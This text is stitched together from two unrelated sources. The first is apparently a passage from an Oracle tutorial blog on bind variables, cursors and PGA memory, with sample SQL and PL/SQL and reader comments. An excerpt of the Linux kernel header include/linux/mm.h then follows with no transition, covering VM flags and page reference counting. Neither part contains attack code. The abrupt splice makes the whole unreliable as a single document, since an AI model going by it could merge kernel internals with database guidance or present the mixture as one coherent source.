    select * from table where name = 'Dratz';

and

    select * from table where name = :b1;

The first one is only "sharable*" when someone wants to limit the name to 'Dratz'; the second one can be reused for any name by just plugging in the name at runtime. That's a bind variable. And it doesn't change the execution plan, so it can be reused by everyone. We'll get into this when we discuss SQL.

--------------------------------------
* Oracle is making it easier and easier to share cursors, but it's good to know what's really happening.
--------------------------------------

When does it go away? When you close the cursor. People run into this problem (and complain "cursors are bad") with EXPLICIT CURSORS a lot. That's because they leave a lot of cursors open that just keep taking up space. Just CLOSE them and you'll be fine (unless your design is so poor that you can't finish your transaction without opening dozens of cursors).
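To make the bind-variable idea concrete, here is a minimal PL/SQL sketch (my illustration, not from the original post; the employees table and name column are made up). Static SQL inside PL/SQL binds the variable automatically, so every execution reuses the same shared cursor no matter which name is supplied:

    DECLARE
       v_name  employees.name%TYPE := 'Dratz';
       v_count PLS_INTEGER;
    BEGIN
       -- The SQL engine sees WHERE name = :B1, not the literal value,
       -- so this parses once and is reused for any v_name.
       SELECT COUNT(*)
         INTO v_count
         FROM employees
        WHERE name = v_name;

       DBMS_OUTPUT.PUT_LINE(v_name || ' appears ' || v_count || ' time(s).');
    END;
    /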
---------------------------------------
CURSORS AND THEIR CURSERS

(I'm going to get sucked into a long SQL or PL/SQL discussion here. If you're not interested in cursors now, GOTO Runtime Area below.)

The word CURSOR has a very long history that I think is interesting, but "beyond the scope of this blog." For the last 30 or 40 years or so, databases have used the term 'cursor', and many people have been confused about them ever since. Here, I will explain just about everything you'll ever need to know about cursors.

For one thing, most people (including me?) that try to explain cursors don't know what they're talking about and confuse personal preference with fact. To understand database cursors, I go back to the original Latin, where the word cursor is used to "express the idea of someone or something that runs."

Now I'll tell you the big secret about cursors in Oracle: all SQL statements are cursors! Be careful who you tell that to, because some people will think you're an idiot for saying that, that you don't understand how complicated databases are, etc. Then they'll probably tell you they've got some kind of certification that proves they know what they're talking about. But the reality is that when a SQL statement is parsed, it is functioning as a cursor.

Some people think that cursors are limited to only PL/SQL, and many more people only think of cursors in their EXPLICIT incarnation. When I type in a DML statement and run it, I am running an IMPLICIT CURSOR. I have really no control over it other than what I put into the statement itself (like maybe a TO_DATE() or a GROUP BY). So, whatever I asked it to do really acts on the whole result set. This is an example of a set-based operation.

If I wanted more control over the set of rows I get back from a SELECT (like I want to evaluate a certain column or two in each row and decide what to do with that row based on the actual data values), then I could use EXPLICIT CURSORS. Explicit cursors are a type of row-based operation and give me a lot of control over how I handle the results I get back.

Another difference between implicit and explicit cursors is how they are handled. For implicit cursors, Oracle handles them for you, meaning that the declare, open, fetch, and close all happen behind the scenes. For explicit cursors, Oracle expects you to tell it how to handle them (since you're taking explicit control). That means you have to explain how you want Oracle to open, fetch, and close the cursor. Not closing cursors is a common mistake that is easily fixed (if you just investigate).

Is that everything you NEED to know about cursors? Yes and no. Yes, because that's basically what they are; no, because there's still lots more to know to really make good design decisions. These other things will be covered in a later post, which will show you how you don't really have to use the keywords OPEN, FETCH, CLOSE to control explicit cursors (what? but you said...) and will go into more application-focused issues like cursor variables (ref cursors) and cursor types like STATIC, FORWARD-ONLY, KEYSET-DRIVEN, etc.

You'll find people who swear by explicit cursors and people who swear they'll never use them. Avoid both types of people and be your own person. Keep reading these posts, understand how Oracle really works, then pick a solution that fits your needs. And don't let some clown tell you that "standards" force you to use one or the other.

++ blame/credit alexisl for getting me to add this sidebar to this post
--------------------------------------
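As a small sketch of the explicit, row-by-row handling described above (again my illustration, reusing the hypothetical employees table), here is the classic OPEN, FETCH, CLOSE pattern, including the CLOSE that keeps the persistent area from piling up:

    DECLARE
       CURSOR c_names IS
          SELECT name FROM employees ORDER BY name;
       v_name employees.name%TYPE;
    BEGIN
       OPEN c_names;                   -- persistent area allocated here
       LOOP
          FETCH c_names INTO v_name;   -- runtime area does the row work
          EXIT WHEN c_names%NOTFOUND;
          -- row-based logic: inspect each value and decide what to do
          DBMS_OUTPUT.PUT_LINE(v_name);
       END LOOP;
       CLOSE c_names;                  -- release the memory; don't skip this
    END;
    /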
RUNTIME AREA

This area stores things that are required during the execution phase of a transaction. In fact, as soon as you get to the EXECUTE phase, the first thing Oracle does is build a runtime area. The thing I want you to be aware of about the runtime area is what makes this piece big (or small).

Say I want to get a list of names from my table in alphabetical order. I issue the following statement:

    SELECT NAME FROM MYTABLE ORDER BY NAME;

Let's say it is the very first statement run after opening up the database (might as well refresh ourselves on earlier posts). What happens:

1. The statement is parsed (we haven't really gone over that yet)
2. We check the buffer cache (it's empty)
3. We read data blocks from disk and put them into the buffer cache (part of the SGA)
4. Our query process reads the data in the buffer cache and does what?
   a. copy the blocks from the SGA to our PGA?
   b. copy only the rows we asked for to our PGA?
   c. copy all of the rows to the PGA, but as rows, not blocks?
   d. copy nothing and just present the results to the client?

That's a good homework question I'll let you ponder until we get to those topics, but since we're talking about the runtime area of the PGA, I have to mention sorting. Because I want my result set delivered alphabetically, something has to SORT the results and put the values in the right order. Right now, I'm not as interested in what does the sorting as much as I am in WHERE this sorting is done. I've read the rows from the blocks in the buffer cache, and now I do a standard sort operation: I have a value; I get the next value; does the second value belong above or below the first value; get the next value; repeat.

Where I put these processed (and processing) rows is in the SORT AREA within the runtime area. Because it's in the runtime area, I know that as soon as I'm done and get those rows delivered, I can reduce the sort area size (basically). I don't want to jump any further into sort areas now; there's more to consider than just the PGA (like when it goes from memory to disk, etc.). But it is important to know about, because with older versions of Oracle, one of the ways to control the variable size of the PGA was to configure the settings for things like sort areas and hash join areas. I'm not going into the details here, because they fit best elsewhere and because Oracle has moved away from those settings anyway to allow more flexible management of PGA resources (memory). See PGA_AGGREGATE_TARGET if you just can't wait.
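If you want to watch your own session's PGA and sort behavior while you experiment, a query along these lines works (my sketch, not from the post; it assumes you can read the V$ performance views, and statistic names can vary a bit by version):

    SELECT sn.name, st.value
      FROM v$mystat st
      JOIN v$statname sn ON sn.statistic# = st.statistic#
     WHERE sn.name IN ('session pga memory',
                       'session pga memory max',
                       'sorts (memory)',
                       'sorts (disk)');

Run it before and after a big ORDER BY and you can see the runtime area grow, and whether the sort stayed in memory or spilled to disk.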
The most important things to know are the basics. So, in summary, the PGA has 3 basic pieces:

1. a fixed-size footprint that is OS specific
2. a "persistent" area that holds things like logon information and bind variables
3. a runtime area that holds notes about the current execution and provides space for things like sorting and hashing.

********************************************

I hope I haven't rushed through the SGA and PGA too quickly. I know there are a lot more things to discuss with each of them, but the basics are the most important pieces. Everything else will easily fall into place in context. The good news is that if you understand these first 7 posts, you know more than half of what you need to know about how Oracle really works.

I'm going to start a couple of posts on Oracle processes next, and then your training will be ready for the next level: becoming a junior DBA. You see, I'm tricking you. I'm teaching you all the hard stuff first. I'm just making it easy by focusing on the basics -- the stuff you really need to know. Then I'll show you how you can fill in the rest of the pieces as you need to. After I explain some important Oracle processes (little specific engines designed to do limited things very well), I will teach you the easiest thing to do with an Oracle database: back it up and recover it.

I'll try to get there by the end of the week, trying to keep up my posts.

Table of Contents for this series

8 Comments

"Cool! Thanks for the comment. I can't believe everything else has been easy to follow so far, so I'm glad I did a poor job here. I will give you a preview here, but I will edit my entry this morning to be more clear about cursors. I had a big section about it towards the top and took it out because I thought it was distracting! Thanks again.

Every SQL statement is really a cursor. If you choose to leave it "auto managed" (my term), it's an IMPLICIT cursor. If you want more control over the result set (like a result set of 10 rows that you want to process individually), you use an EXPLICIT cursor. There are three basic phases of handling explicit cursors: open, fetch, close. The OPEN phase is where the persistent area gets created; the FETCH phase is where the runtime area gets created; the CLOSE is where you release the memory. I'll clean that up and add it to the post, thanks again."

"alexisl (or anyone else), please let me know if that chunk in the middle explains cursors well enough for now or not. Hopefully it answers your questions about what a cursor is in Oracle, how implicit cursors are closed for you, and the syntax to use after you explicitly declare a cursor: OPEN (the cursor), FETCH (rows from the cursor and do whatever you want to do), CLOSE (the cursor when you're done with it). I quite often use explicit cursors (especially since I'm doing a lot of ETL coding) and I haven't used the OPEN, FETCH, CLOSE syntax in years. I'll show you how later, but I still like the option of using OPEN, FETCH, CLOSE for my explicit cursors when I want to."

"Thanks, Rosco. I've gotten a lot of positive feedback from developers who are happy to understand Oracle a little better. I hope it helps. Instead of looking for a publisher now, I've decided to just finish it and worry about that later."

"Hi all, I am still waiting for this "later post" about cursor variables (ref cursors) and cursor types like STATIC, FORWARD-ONLY, KEYSET-DRIVEN, etc. Thanks! Marcela"

"Thanks for reminding me, Marcela. I will try to work on that one next."

"Just to continue with the question put by DBA, I think it would be answer 'a'. I agree. Please confirm, Master, to remove any confusion in this regard."

"Hi Dratz, it would really be very useful to all of us if you could explain the one below, with answers.

4. Our query process reads the data in the buffer cache and does what?
   a. copy the blocks from the SGA to our PGA?
   b. copy only the rows we asked for to our PGA?
   c. copy all of the rows to the PGA, but as rows, not blocks?
   d. copy nothing and just present the results to the client?

As per me, I think it will go for option (b). Also one more request: could you explain in a bit of detail how insert, update, and delete DML operations actually work internally? Also the most dreadful part, the JOIN. It would really help all of us in understanding Oracle a bit more clearly. And really, HATS OFF to you for being so kind and taking the time to explain the basics of Oracle. Kindly come up with one of your books; it will surely be worth every penny. Thanks again for such a wonderful post!!! Keep going, and please explain the topics asked above. Cheers,"

"Hi Dratz, the information regarding the PGA is very interesting.... Thanks a lot for providing us a basic low-level view of ORACLE. One question related to the PGA crosses my mind every time I think about it; could you please provide me the answer? The question is:

4. Our query process reads the data in the buffer cache and does what?
   a. copy the blocks from the SGA to our PGA?
   b. copy only the rows we asked for to our PGA?
   c. copy all of the rows to the PGA, but as rows, not blocks?
   d. copy nothing and just present the results to the client?

Will it get the data from the SGA to the PGA?"
File: include/linux/mm.h (Linux kernel source, excerpt)
#ifndef _LINUX_MM_H
#define _LINUX_MM_H

#include <linux/errno.h>

#ifdef __KERNEL__

#include <linux/gfp.h>
#include <linux/list.h>
#include <linux/mmzone.h>
#include <linux/rbtree.h>
#include <linux/prio_tree.h>
#include <linux/debug_locks.h>
#include <linux/mm_types.h>

struct mempolicy;
struct anon_vma;
struct file_ra_state;
struct user_struct;
struct writeback_control;
struct rlimit;

#ifndef CONFIG_DISCONTIGMEM          /* Don't use mapnrs, do it properly */
extern unsigned long max_mapnr;
#endif

extern unsigned long num_physpages;
extern unsigned long totalram_pages;
extern void * high_memory;
extern int page_cluster;

#ifdef CONFIG_SYSCTL
extern int sysctl_legacy_va_layout;
#else
#define sysctl_legacy_va_layout 0
#endif

#include <asm/page.h>
#include <asm/pgtable.h>
#include <asm/processor.h>

#define nth_page(page,n) pfn_to_page(page_to_pfn((page)) + (n))

/* to align the pointer to the (next) page boundary */
#define PAGE_ALIGN(addr) ALIGN(addr, PAGE_SIZE)

/*
 * Linux kernel virtual memory manager primitives.
 * The idea being to have a "virtual" mm in the same way
 * we have a virtual fs - giving a cleaner interface to the
 * mm details, and allowing different kinds of memory mappings
 * (from shared memory to executable loading to arbitrary
 * mmap() functions).
 */

extern struct kmem_cache *vm_area_cachep;

#ifndef CONFIG_MMU
extern struct rb_root nommu_region_tree;
extern struct rw_semaphore nommu_region_sem;

extern unsigned int kobjsize(const void *objp);
#endif

/*
 * vm_flags in vm_area_struct, see mm_types.h.
*/ #define VM_READ 0x00000001 /* currently active flags */ #define VM_WRITE 0x00000002 #define VM_EXEC 0x00000004 #define VM_SHARED 0x00000008 /* mprotect() hardcodes VM_MAYREAD >> 4 == VM_READ, and so for r/w/x bits. */ #define VM_MAYREAD 0x00000010 /* limits for mprotect() etc */ #define VM_MAYWRITE 0x00000020 #define VM_MAYEXEC 0x00000040 #define VM_MAYSHARE 0x00000080 #define VM_GROWSDOWN 0x00000100 /* general info on the segment */ #define VM_GROWSUP 0x00000200 #define VM_PFNMAP 0x00000400 /* Page-ranges managed without "struct page", just pure PFN */ #define VM_DENYWRITE 0x00000800 /* ETXTBSY on write attempts.. */ #define VM_EXECUTABLE 0x00001000 #define VM_LOCKED 0x00002000 #define VM_IO 0x00004000 /* Memory mapped I/O or similar */ /* Used by sys_madvise() */ #define VM_SEQ_READ 0x00008000 /* App will access data sequentially */ #define VM_RAND_READ 0x00010000 /* App will not benefit from clustered reads */ #define VM_DONTCOPY 0x00020000 /* Do not copy this vma on fork */ #define VM_DONTEXPAND 0x00040000 /* Cannot expand with mremap() */ #define VM_RESERVED 0x00080000 /* Count as reserved_vm like IO */ #define VM_ACCOUNT 0x00100000 /* Is a VM accounted object */ #define VM_NORESERVE 0x00200000 /* should the VM suppress accounting */ #define VM_HUGETLB 0x00400000 /* Huge TLB Page VM */ #define VM_NONLINEAR 0x00800000 /* Is non-linear (remap_file_pages) */ #define VM_MAPPED_COPY 0x01000000 /* T if mapped copy of data (nommu mmap) */ #define VM_INSERTPAGE 0x02000000 /* The vma has had "vm_insert_page()" done on it */ #define VM_ALWAYSDUMP 0x04000000 /* Always include in core dumps */ #define VM_CAN_NONLINEAR 0x08000000 /* Has ->fault & does nonlinear pages */ #define VM_MIXEDMAP 0x10000000 /* Can contain "struct page" and pure PFN pages */ #define VM_SAO 0x20000000 /* Strong Access Ordering (powerpc) */ #define VM_PFN_AT_MMAP 0x40000000 /* PFNMAP vma that is fully mapped at mmap time */ #define VM_MERGEABLE 0x80000000 /* KSM may merge identical pages */ #ifndef VM_STACK_DEFAULT_FLAGS /* arch can override this */ #define VM_STACK_DEFAULT_FLAGS VM_DATA_DEFAULT_FLAGS #endif #ifdef CONFIG_STACK_GROWSUP #define VM_STACK_FLAGS (VM_GROWSUP | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT) #else #define VM_STACK_FLAGS (VM_GROWSDOWN | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT) #endif #define VM_READHINTMASK (VM_SEQ_READ | VM_RAND_READ) #define VM_ClearReadHint(v) (v)->vm_flags &= ~VM_READHINTMASK #define VM_NormalReadHint(v) (!((v)->vm_flags & VM_READHINTMASK)) #define VM_SequentialReadHint(v) ((v)->vm_flags & VM_SEQ_READ) #define VM_RandomReadHint(v) ((v)->vm_flags & VM_RAND_READ) /* * special vmas that are non-mergable, non-mlock()able */ #define VM_SPECIAL (VM_IO | VM_DONTEXPAND | VM_RESERVED | VM_PFNMAP) /* * mapping from the currently active vm_flags protection bits (the * low four bits) to a page protection mask.. */ extern pgprot_t protection_map[16]; #define FAULT_FLAG_WRITE 0x01 /* Fault was a write access */ #define FAULT_FLAG_NONLINEAR 0x02 /* Fault was via a nonlinear mapping */ #define FAULT_FLAG_MKWRITE 0x04 /* Fault was mkwrite of existing pte */ /* * This interface is used by x86 PAT code to identify a pfn mapping that is * linear over entire vma. This is to optimize PAT code that deals with * marking the physical region with a particular prot. This is not for generic * mm use. Note also that this check will not work if the pfn mapping is * linear for a vma starting at physical address 0. In which case PAT code * falls back to slow path of reserving physical range page by page. 
*/ static inline int is_linear_pfn_mapping(struct vm_area_struct *vma) { return (vma->vm_flags & VM_PFN_AT_MMAP); } static inline int is_pfn_mapping(struct vm_area_struct *vma) { return (vma->vm_flags & VM_PFNMAP); } /* * vm_fault is filled by the the pagefault handler and passed to the vma's * ->fault function. The vma's ->fault is responsible for returning a bitmask * of VM_FAULT_xxx flags that give details about how the fault was handled. * * pgoff should be used in favour of virtual_address, if possible. If pgoff * is used, one may set VM_CAN_NONLINEAR in the vma->vm_flags to get nonlinear * mapping support. */ struct vm_fault { unsigned int flags; /* FAULT_FLAG_xxx flags */ pgoff_t pgoff; /* Logical page offset based on vma */ void __user *virtual_address; /* Faulting virtual address */ struct page *page; /* ->fault handlers should return a * page here, unless VM_FAULT_NOPAGE * is set (which is also implied by * VM_FAULT_ERROR). */ }; /* * These are the virtual MM functions - opening of an area, closing and * unmapping it (needed to keep files on disk up-to-date etc), pointer * to the functions called when a no-page or a wp-page exception occurs. */ struct vm_operations_struct { void (*open)(struct vm_area_struct * area); void (*close)(struct vm_area_struct * area); int (*fault)(struct vm_area_struct *vma, struct vm_fault *vmf); /* notification that a previously read-only page is about to become * writable, if an error is returned it will cause a SIGBUS */ int (*page_mkwrite)(struct vm_area_struct *vma, struct vm_fault *vmf); /* called by access_process_vm when get_user_pages() fails, typically * for use by special VMAs that can switch between memory and hardware */ int (*access)(struct vm_area_struct *vma, unsigned long addr, void *buf, int len, int write); #ifdef CONFIG_NUMA /* * set_policy() op must add a reference to any non-NULL @new mempolicy * to hold the policy upon return. Caller should pass NULL @new to * remove a policy and fall back to surrounding context--i.e. do not * install a MPOL_DEFAULT policy, nor the task or system default * mempolicy. */ int (*set_policy)(struct vm_area_struct *vma, struct mempolicy *new); /* * get_policy() op must add reference [mpol_get()] to any policy at * (vma,addr) marked as MPOL_SHARED. The shared policy infrastructure * in mm/mempolicy.c will do this automatically. * get_policy() must NOT add a ref if the policy at (vma,addr) is not * marked as MPOL_SHARED. vma policies are protected by the mmap_sem. * If no [shared/vma] mempolicy exists at the addr, get_policy() op * must return NULL--i.e., do not "fallback" to task or system default * policy. */ struct mempolicy *(*get_policy)(struct vm_area_struct *vma, unsigned long addr); int (*migrate)(struct vm_area_struct *vma, const nodemask_t *from, const nodemask_t *to, unsigned long flags); #endif }; struct mmu_gather; struct inode; #define page_private(page) ((page)->private) #define set_page_private(page, v) ((page)->private = (v)) /* * FIXME: take this include out, include page-flags.h in * files which need it (119 of them) */ #include <linux/page-flags.h> /* * Methods to modify the page usage count. * * What counts for a page usage: * - cache mapping (page->mapping) * - private data (page->private) * - page mapped in a task's page tables, each mapping * is counted separately * * Also, many kernel routines increase the page count before a critical * routine so they can be sure the page doesn't go away from under them. 
*/ /* * Drop a ref, return true if the refcount fell to zero (the page has no users) */ static inline int put_page_testzero(struct page *page) { VM_BUG_ON(atomic_read(&page->_count) == 0); return atomic_dec_and_test(&page->_count); } /* * Try to grab a ref unless the page has a refcount of zero, return false if * that is the case. */ static inline int get_page_unless_zero(struct page *page) { return atomic_inc_not_zero(&page->_count); } /* Support for virtually mapped pages */ struct page *vmalloc_to_page(const void *addr); unsigned long vmalloc_to_pfn(const void *addr); /* * Determine if an address is within the vmalloc range * * On nommu, vmalloc/vfree wrap through kmalloc/kfree directly, so there * is no special casing required. */ static inline int is_vmalloc_addr(const void *x) { #ifdef CONFIG_MMU unsigned long addr = (unsigned long)x; return addr >= VMALLOC_START && addr < VMALLOC_END; #else return 0; #endif } #ifdef CONFIG_MMU extern int is_vmalloc_or_module_addr(const void *x); #else static inline int is_vmalloc_or_module_addr(const void *x) { return 0; } #endif static inline struct page *compound_head(struct page *page) { if (unlikely(PageTail(page))) return page->first_page; return page; } static inline int page_count(struct page *page) { return atomic_read(&compound_head(page)->_count); } static inline void get_page(struct page *page) { page = compound_head(page); VM_BUG_ON(atomic_read(&page->_count) == 0); atomic_inc(&page->_count); } static inline struct page *virt_to_head_page(const void *x) { struct page *page = virt_to_page(x); return compound_head(page); } /* * Setup the page count before being freed into the page allocator for * the first time (boot or memory hotplug) */ static inline void init_page_count(struct page *page) { atomic_set(&page->_count, 1); } void put_page(struct page *page); void put_pages_list(struct list_head *pages); void split_page(struct page *page, unsigned int order); /* * Compound pages have a destructor function. Provide a * prototype for that function and accessor functions. * These are _only_ valid on the head of a PG_compound page. */ typedef void compound_page_dtor(struct page *); static inline void set_compound_page_dtor(struct page *page, compound_page_dtor *dtor) { page[1].lru.next = (void *)dtor; } static inline compound_page_dtor *get_compound_page_dtor(struct page *page) { return (compound_page_dtor *)page[1].lru.next; } static inline int compound_order(struct page *page) { if (!PageHead(page)) return 0; return (unsigned long)page[1].lru.prev; } static inline void set_compound_order(struct page *page, unsigned long order) { page[1].lru.prev = (void *)order; } /* * Multiple processes may "see" the same page. E.g. for untouched * mappings of /dev/null, all processes see the same page full of * zeroes, and text pages of executables and shared libraries have * only one copy in memory, at most, normally. * * For the non-reserved pages, page_count(page) denotes a reference count. * page_count() == 0 means the page is free. page->lru is then used for * freelist management in the buddy allocator. * page_count() > 0 means the page has been allocated. * * Pages are allocated by the slab allocator in order to provide memory * to kmalloc and kmem_cache_alloc. In this case, the management of the * page, and the fields in 'struct page' are the responsibility of mm/slab.c * unless a particular usage is carefully commented. (the responsibility of * freeing the kmalloc memory is the caller's, of course). 
 *
 * A page may be used by anyone else who does a __get_free_page().
 * In this case, page_count still tracks the references, and should only
 * be used through the normal accessor functions. The top bits of page->flags
 * and page->virtual store page management information, but all other fields
 * are unused and could be used privately, carefully. The management of this
 * page is the responsibility of the one who allocated it, and those who have
 * subsequently been given references to it.
 *
 * The other pages (we may call them "pagecache pages") are completely
 * managed by the Linux memory manager: I/O, buffers, swapping etc.
 * The following discussion applies only to them.
 *
 * A pagecache page contains an opaque `private' member, which belongs to the
 * page's address_space. Usually, this is the address of a circular list of
 * the page's disk buffers. PG_private must be set to tell the VM to call
 * into the filesystem to release these pages.
 *
 * A page may belong to an inode's memory mapping. In this case, page->mapping
 * is the pointer to the inode, and page->index is the file offset of the page,
 * in units of PAGE_CACHE_SIZE.
 *
 * If pagecache pages are not associated with an inode, they are said to be
 * anonymous pages. These may become associated with the swapcache, and in that
 * case PG_swapcache is set, and page->private is an offset into the swapcache.
 *
 * In either case (swapcache or inode backed), the pagecache itself holds one
 * reference to the page. Setting PG_private should also increment the
 * refcount. Each user mapping also has a reference to the page.
 *
 * The pagecache pages are stored in a per-mapping radix tree, which is
 * rooted at mapping->page_tree, and indexed by offset.
 * Where 2.4 and early 2.6 kernels kept dirty/clean pages in per-address_space
 * lists, we instead now tag pages as dirty/writeback in the radix tree.
 *
 * All pagecache pages may be subject to I/O:
 * - inode pages may need to be read from disk,
 * - inode pages which have been modified and are MAP_SHARED may need
 *   to be written back to the inode on disk,
 * - anonymous pages (including MAP_PRIVATE file mappings) which have been
 *   modified may need to be swapped out to swap space and (later) to be read
 *   back into memory.
 */

/*
 * The zone field is never updated after free_area_init_core()
 * sets it, so none of the operations on it need to be atomic.
 */

/*
 * page->flags layout:
 *
 * There are three possibilities for how page->flags get
 * laid out.  The first is for the normal case, without
 * sparsemem.  The second is for sparsemem when there is
 * plenty of space for node and section.  The last is when
 * we have run out of space and have to fall back to an
 * alternate (slower) way of determining the node.
 *
 * No sparsemem or sparsemem vmemmap: |       NODE     | ZONE | ... | FLAGS |
 * classic sparse with space for node:| SECTION | NODE | ZONE | ... | FLAGS |
 * classic sparse no space for node:  | SECTION |     ZONE    | ... | FLAGS |
 */
#if defined(CONFIG_SPARSEMEM) && !defined(CONFIG_SPARSEMEM_VMEMMAP)
#define SECTIONS_WIDTH		SECTIONS_SHIFT
#else
#define SECTIONS_WIDTH		0
#endif

#define ZONES_WIDTH		ZONES_SHIFT

#if SECTIONS_WIDTH+ZONES_WIDTH+NODES_SHIFT <= BITS_PER_LONG - NR_PAGEFLAGS
#define NODES_WIDTH		NODES_SHIFT
#else
#ifdef CONFIG_SPARSEMEM_VMEMMAP
#error "Vmemmap: No space for nodes field in page flags"
#endif
#define NODES_WIDTH		0
#endif

/* Page flags: | [SECTION] | [NODE] | ZONE | ... | FLAGS | */
#define SECTIONS_PGOFF		((sizeof(unsigned long)*8) - SECTIONS_WIDTH)
#define NODES_PGOFF		(SECTIONS_PGOFF - NODES_WIDTH)
#define ZONES_PGOFF		(NODES_PGOFF - ZONES_WIDTH)

/*
 * We are going to use the flags for the page to node mapping if it's in
 * there.  This includes the case where there is no node, so it is implicit.
 */
#if !(NODES_WIDTH > 0 || NODES_SHIFT == 0)
#define NODE_NOT_IN_PAGE_FLAGS
#endif

#ifndef PFN_SECTION_SHIFT
#define PFN_SECTION_SHIFT 0
#endif

/*
 * Define the bit shifts to access each section.  For non-existent
 * sections we define the shift as 0; that plus a 0 mask ensures
 * the compiler will optimise away reference to them.
 */
#define SECTIONS_PGSHIFT	(SECTIONS_PGOFF * (SECTIONS_WIDTH != 0))
#define NODES_PGSHIFT		(NODES_PGOFF * (NODES_WIDTH != 0))
#define ZONES_PGSHIFT		(ZONES_PGOFF * (ZONES_WIDTH != 0))

/* NODE:ZONE or SECTION:ZONE is used to ID a zone for the buddy allocator */
#ifdef NODE_NOT_IN_PAGE_FLAGS
#define ZONEID_SHIFT		(SECTIONS_SHIFT + ZONES_SHIFT)
#define ZONEID_PGOFF		((SECTIONS_PGOFF < ZONES_PGOFF)? \
						SECTIONS_PGOFF : ZONES_PGOFF)
#else
#define ZONEID_SHIFT		(NODES_SHIFT + ZONES_SHIFT)
#define ZONEID_PGOFF		((NODES_PGOFF < ZONES_PGOFF)? \
						NODES_PGOFF : ZONES_PGOFF)
#endif

#define ZONEID_PGSHIFT		(ZONEID_PGOFF * (ZONEID_SHIFT != 0))

#if SECTIONS_WIDTH+NODES_WIDTH+ZONES_WIDTH > BITS_PER_LONG - NR_PAGEFLAGS
#error SECTIONS_WIDTH+NODES_WIDTH+ZONES_WIDTH > BITS_PER_LONG - NR_PAGEFLAGS
#endif

#define ZONES_MASK		((1UL << ZONES_WIDTH) - 1)
#define NODES_MASK		((1UL << NODES_WIDTH) - 1)
#define SECTIONS_MASK		((1UL << SECTIONS_WIDTH) - 1)
#define ZONEID_MASK		((1UL << ZONEID_SHIFT) - 1)

static inline enum zone_type page_zonenum(struct page *page)
{
	return (page->flags >> ZONES_PGSHIFT) & ZONES_MASK;
}

/*
 * The identification function is only used by the buddy allocator for
 * determining if two pages could be buddies. We are not really
 * identifying a zone since we could be using the section number
 * id if no node id is available in page flags.
 * We guarantee only that it will return the same value for two
 * combinable pages in a zone.
 */
static inline int page_zone_id(struct page *page)
{
	return (page->flags >> ZONEID_PGSHIFT) & ZONEID_MASK;
}

static inline int zone_to_nid(struct zone *zone)
{
#ifdef CONFIG_NUMA
	return zone->node;
#else
	return 0;
#endif
}

#ifdef NODE_NOT_IN_PAGE_FLAGS
extern int page_to_nid(struct page *page);
#else
static inline int page_to_nid(struct page *page)
{
	return (page->flags >> NODES_PGSHIFT) & NODES_MASK;
}
#endif

static inline struct zone *page_zone(struct page *page)
{
	return &NODE_DATA(page_to_nid(page))->node_zones[page_zonenum(page)];
}

#if defined(CONFIG_SPARSEMEM) && !defined(CONFIG_SPARSEMEM_VMEMMAP)
static inline unsigned long page_to_section(struct page *page)
{
	return (page->flags >> SECTIONS_PGSHIFT) & SECTIONS_MASK;
}
#endif

static inline void set_page_zone(struct page *page, enum zone_type zone)
{
	page->flags &= ~(ZONES_MASK << ZONES_PGSHIFT);
	page->flags |= (zone & ZONES_MASK) << ZONES_PGSHIFT;
}

static inline void set_page_node(struct page *page, unsigned long node)
{
	page->flags &= ~(NODES_MASK << NODES_PGSHIFT);
	page->flags |= (node & NODES_MASK) << NODES_PGSHIFT;
}

static inline void set_page_section(struct page *page, unsigned long section)
{
	page->flags &= ~(SECTIONS_MASK << SECTIONS_PGSHIFT);
	page->flags |= (section & SECTIONS_MASK) << SECTIONS_PGSHIFT;
}

static inline void set_page_links(struct page *page, enum zone_type zone,
	unsigned long node, unsigned long pfn)
{
	set_page_zone(page, zone);
	set_page_node(page, node);
	set_page_section(page, pfn_to_section_nr(pfn));
}

/*
 * Some inline functions in vmstat.h depend on page_zone()
 */
#include <linux/vmstat.h>

static __always_inline void *lowmem_page_address(struct page *page)
{
	return __va(page_to_pfn(page) << PAGE_SHIFT);
}

#if defined(CONFIG_HIGHMEM) && !defined(WANT_PAGE_VIRTUAL)
#define HASHED_PAGE_VIRTUAL
#endif

#if defined(WANT_PAGE_VIRTUAL)
#define page_address(page) ((page)->virtual)
#define set_page_address(page, address)			\
	do {						\
		(page)->virtual = (address);		\
	} while(0)
#define page_address_init()  do { } while(0)
#endif

#if defined(HASHED_PAGE_VIRTUAL)
void *page_address(struct page *page);
void set_page_address(struct page *page, void *virtual);
void page_address_init(void);
#endif

#if !defined(HASHED_PAGE_VIRTUAL) && !defined(WANT_PAGE_VIRTUAL)
#define page_address(page) lowmem_page_address(page)
#define set_page_address(page, address)  do { } while(0)
#define page_address_init()  do { } while(0)
#endif

/*
 * On an anonymous page mapped into a user virtual memory area,
 * page->mapping points to its anon_vma, not to a struct address_space;
 * with the PAGE_MAPPING_ANON bit set to distinguish it.
 *
 * Please note that, confusingly, "page_mapping" refers to the inode
 * address_space which maps the page from disk; whereas "page_mapped"
 * refers to user virtual address space into which the page is mapped.
 */
#define PAGE_MAPPING_ANON	1

extern struct address_space swapper_space;
static inline struct address_space *page_mapping(struct page *page)
{
	struct address_space *mapping = page->mapping;

	VM_BUG_ON(PageSlab(page));
#ifdef CONFIG_SWAP
	if (unlikely(PageSwapCache(page)))
		mapping = &swapper_space;
	else
#endif
	if (unlikely((unsigned long)mapping & PAGE_MAPPING_ANON))
		mapping = NULL;
	return mapping;
}

static inline int PageAnon(struct page *page)
{
	return ((unsigned long)page->mapping & PAGE_MAPPING_ANON) != 0;
}

/*
 * Return the pagecache index of the passed page.  Regular pagecache pages
 * use ->index whereas swapcache pages use ->private
 */
static inline pgoff_t page_index(struct page *page)
{
	if (unlikely(PageSwapCache(page)))
		return page_private(page);
	return page->index;
}

/*
 * The atomic page->_mapcount, like _count, starts from -1:
 * so that transitions both from it and to it can be tracked,
 * using atomic_inc_and_test and atomic_add_negative(-1).
 */
static inline void reset_page_mapcount(struct page *page)
{
	atomic_set(&(page)->_mapcount, -1);
}

static inline int page_mapcount(struct page *page)
{
	return atomic_read(&(page)->_mapcount) + 1;
}

/*
 * Return true if this page is mapped into pagetables.
 */
static inline int page_mapped(struct page *page)
{
	return atomic_read(&(page)->_mapcount) >= 0;
}

/*
 * Different kinds of faults, as returned by handle_mm_fault().
 * Used to decide whether a process gets delivered SIGBUS or
 * just gets major/minor fault counters bumped up.
 */

#define VM_FAULT_MINOR	0 /* For backwards compat. Remove me quickly. */

#define VM_FAULT_OOM	0x0001
#define VM_FAULT_SIGBUS	0x0002
#define VM_FAULT_MAJOR	0x0004
#define VM_FAULT_WRITE	0x0008	/* Special case for get_user_pages */
